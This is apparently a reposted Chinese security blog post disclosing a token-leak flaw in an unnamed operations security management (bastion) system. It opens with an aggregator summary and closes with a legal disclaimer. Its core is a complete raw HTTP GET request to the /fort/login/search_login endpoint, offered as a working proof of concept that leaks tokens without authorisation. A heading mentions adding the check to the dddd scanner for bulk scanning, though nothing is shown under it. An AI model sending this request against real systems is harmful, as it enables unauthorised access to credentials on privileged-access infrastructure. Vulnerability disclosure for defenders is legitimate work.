文章总结： 本文披露了某运维安全管理系统存在token泄露漏洞。作者通过发送特定的GET请求至/fort/login/search_login接口，成功复现了该漏洞，证明了系统未授权访问导致敏感信息泄露的风险。文章还演示了如何将该漏洞检测集成到dddd工具中，方便安全人员进行批量扫描与验证，具有较强的实战操作性，建议相关厂商及时修补。 综合评分： 62 文章分类： 漏洞POC,漏洞分析,安全工具

某运维安全管理系统存在token泄露漏洞

安全艺术 安全艺术

安全艺术

2026年3月6日 17:00 北京

1. 漏洞复现

GET /fort/login/search_login HTTP/1.1
Host:
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive

2. dddd集成

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全艺术 安全艺术 安全艺术《某运维安全管理系统存在token泄露漏洞》